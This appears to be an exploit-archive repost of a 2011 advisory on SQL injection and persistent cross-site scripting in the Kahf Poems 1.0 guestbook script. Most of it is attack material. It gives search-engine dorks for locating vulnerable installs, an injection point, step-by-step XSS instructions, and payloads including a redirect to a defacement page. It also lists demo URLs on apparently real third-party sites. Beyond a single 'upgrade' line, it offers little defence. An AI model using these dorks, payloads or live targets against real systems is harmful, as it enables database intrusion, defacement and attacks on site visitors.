Lucene search

K
exploitpackYassin AboukirEXPLOITPACK:964DB2DB16A4DED2D0C4E2E9C810270E
HistoryAug 13, 2011 - 12:00 a.m.

Kahf Poems 1.0 - Multiple Vulnerabilities

2011-08-1300:00:00
Yassin Aboukir
34

Kahf Poems 1.0 - Multiple Vulnerabilities

################################################################################################
[+] Title            : Kahf Poems V1.0 (guestbook.php) SQL Injection
[+] Name             : Kahf Poems
[+] Affected Version : v1.0
[+] Software Link    : http://www.traidnt.net/vb/traidnt19736/
[+] Tested on        : (L):Vista & Windows Xp and Windows 7
[+] Date             : 13/08/2011
[+] Dork             : "intitle:Kahf Poems -> v 1.0 beta"  &   "inurl:guestbook.php?diwan_id="
#################################################################################################
[+] Author           : Yassin Aboukir
[+] Contact          : [email protected]
[+] Site             : http://www.yaboukir.com
#################################################################################################


[+] Error        : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',10' at line 1

[+] How to exploit :

http://localhost/Path/guestbook.php?diwan_id=8&action=view&offset=1[SQL HERE]

[+] Fix : upgrade to last release (v3)


[+] Special Thanks to Ayoub Aboukir & All Friends ...

[+] Demos : 
http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=1'
http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=5860'

################################################################################################
[+] Title            : Kahf Poems V1.0 (guestbook.php) Persistent XSS
[+] Name             : Kahf Poems
[+] Affected Version : v1.0
[+] Software Link    : http://www.traidnt.net/vb/traidnt19736/
[+] Tested on        : (L):Vista & Windows Xp and Windows 7
[+] Date             : 13/08/2011
[+] Dork             : "intitle:Kahf Poems -> v 1.0 beta"  &   "inurl:guestbook.php?diwan_id="
#################################################################################################
[+] Author           : Yassin Aboukir
[+] Contact          : [email protected]
[+] Site             : http://www.yaboukir.com
#################################################################################################

[+] Details        : Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

[+] How to exploit :

1- Go there : http://localhost/Path/guestbook.php?action=addnew&diwan_id=1 .

2- Put in Body field the XSS Code.
Example 1: <META http-equiv="refresh" content="0;URL=http://www.Deface-page.com">  .
Example 2: <script>alert('Xssed by The W0rm')</script>

3- Put anything in the other field ( Name & E-mail).

4- Now anyone go to the guestbook page will redirected to your own paege OR exploit your XSS Code.


[+] Fix : upgrade to last release.


[+] Special Thanks to Ayoub Aboukir & All Friends ...

[+] Demos : 
http://www.yaaam.com/poems/guestbook.php?diwan_id=1&action=view&offset=0
http://www.alalarja.com/poems/guestbook.php?diwan_id=1&action=view&offset=0